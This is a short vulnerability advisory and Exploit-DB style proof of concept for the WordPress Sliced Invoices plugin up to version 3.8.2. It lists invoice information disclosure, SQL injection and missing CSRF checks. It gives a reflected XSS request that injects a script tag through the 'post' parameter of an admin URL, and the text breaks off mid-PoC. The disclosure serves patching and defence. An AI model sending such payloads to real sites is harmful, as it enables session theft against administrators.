- Unauthenticated information disclosure, allowing attackers to access arbitrary invoices and quotes containing PII - Authenticated SQL injection and information disclosure - Additional issues, such as lack of CSRF and Authorisation checks on AJAX methods used to search invoices. - Authenticated Reflected XSS v3.8.4 also added various sanitisation

PoC

Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authentificated Reflected XSS Vulnerability # Date: 22-10-2019 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Webiste: https://nitesculucian.github.io # Vendor Homepage: https://slicedinvoices.com/ # Software Link: https://wordpress.org/plugins/sliced-invoices/ # Version: 3.8.2 # Tested on: Ubuntu 18.04 / Wordpress 5.3 1. Description: Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability. 2. Proof of Concept: Reflected Cross-site scripting (XSS) - Using an Wordpress user, access < your_target > /wp-admin/admin.php?action=duplicate_quote_invoice&post;=%3Cscript%3Ealert(1)%3C%2fscript%3E - The response will contain: ```

Creation failed, could not find original invoice or quote: